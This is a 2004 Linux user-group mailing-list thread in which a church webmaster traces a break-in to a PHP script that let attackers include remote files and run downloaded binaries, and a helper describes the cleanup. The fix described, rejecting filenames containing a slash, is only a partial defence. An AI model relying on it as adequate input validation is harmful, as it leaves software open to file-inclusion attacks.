Hmmm.  After digging on Doug's system, I found a little more.

Apparently the PHP include statement can include files ON ANOTHER SYSTEM. 
Yep, the hacker put a script on tripod.com, then submitted a request to
include it.  The first time he/she attempted to download and compile a DOS
client.  No compiler installed.  Then they tried running a perl script. 
Then apparently they just downloaded binaries to /tmp and ran them.  The
nerve of the guy...

The good news is since PHP only runs as user Apache, there were limited
places that they could write or run programs.  No rootkits.

He did leave a program called tty and bindtty (his clients), which I
trashed, as well as all the other files he created (I scanned the entire
system).  I also ran a clean copy of ps and netstat to make sure there
wasn't something else running.

We all learn something everyday...  Especially with Linux.

Pastor Doug Coats said:
> The answer is.....
>
> Me!
>
> I programmed our web page with a vital error.  I passed a variable that
> contained the name of a file to be opened is such a way that it could be
> changed.  So the hacker simply changed it to whatever file they wanted
> to see and presto - I handed them my box.
>
> Good news - We find no evidence that they have capitalized on this
> information yet.
>
> Bad news - I have to change everyone's passwords immediately.
>
> I fixed(with the help of a friend) the website by checking the variable
> for a "/".  If it contains that if simple kills the script.  So now they
> are locked into that directory.
>
> I will probably change it more so that the variable doesn't match the
> exact file it is opening but I think the passwords come first.
>
> Thank you for everyone that helped out.  I finally tracked what the
> cracker was attempting to do in the httpd error logs and then duplicated
> their efforts to my horror.
>
> Live and learn.
>
> Doug
>
> -----Original Message-----
> From: tclug-list-bounces at mn-linux.org
> [mailto:tclug-list-bounces at mn-linux.org]On Behalf Of Pastor Doug Coats
> Sent: Thursday, March 04, 2004 8:55 AM
> To: TCLUG Mailing List
> Subject: [TCLUG] Attack
>
>
> I am running Fedora Core1 and had an interesting attack show up in my
> logs.
>
> Someone tried to ssh running through the entire list of users.
>
> My question is how did they get that list of valid users?  There is no
> evidence of simply trying random users - they knew every user.
>
> Is there something in Linux that would return a request for every user
> name?
>
> Is there something I should have turned off so that cannot happen again?
>
> I blocked their IP address in IPTables but they can find a way around
> that. And I would like to block anyone from trying something similar.
>
> Any suggestions would be greatly appreciated.
>
> Thanks All,
>
> Doug
>
>
> _______________________________________________
> TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
> http://www.mn-linux.org tclug-list at mn-linux.org
> https://mailman.real-time.com/mailman/listinfo/tclug-list
>
>
> _______________________________________________
> TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
> http://www.mn-linux.org tclug-list at mn-linux.org
> https://mailman.real-time.com/mailman/listinfo/tclug-list




_______________________________________________
TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
http://www.mn-linux.org tclug-list at mn-linux.org
https://mailman.real-time.com/mailman/listinfo/tclug-list